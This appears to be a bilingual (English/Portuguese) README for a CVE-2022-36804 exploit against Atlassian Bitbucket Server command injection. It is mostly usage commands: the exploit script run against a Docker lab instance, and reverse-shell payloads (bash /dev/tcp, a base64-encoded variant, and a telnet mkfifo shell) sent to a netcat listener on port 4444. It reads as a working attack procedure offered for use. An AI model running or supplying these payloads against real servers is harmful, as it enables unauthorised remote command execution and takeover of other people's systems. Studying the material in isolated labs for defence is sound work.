
A critical command injection vulnerability was found in multiple API endpoints of the Atlassian Bit bucket Server and Data center. This vulnerability affects all versions of Bitbucket Server and Data Center released before versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, and <8.3.1
Uma vulnerabilidade crítica de injeção de comandos foi encontrada em vários endpoints de API do Atlassian Bitbucket Server e Data Center. Esta vulnerabilidade afeta todas as versões do Bitbucket Server e Data Center lançadas antes das versões <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2> e <8.3.1>
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7
Substitua 172.17.0.3 pelo seu endereço IP local
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"
Inicie o listener netcat com:
nc -lvp 4444
Converta /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 para base64 em caso de erro de execução do payload.
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"
Se você ainda estiver enfrentando algum erro, execute o comando abaixo:
TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"
É recomendável instalar a versão vulnerável do Bitbucket Server em uma máquina Windows/Linux para praticar. Será mais fácil obter um reverse shell em comparação com imagens docker.
Mais informações podem ser encontradas aqui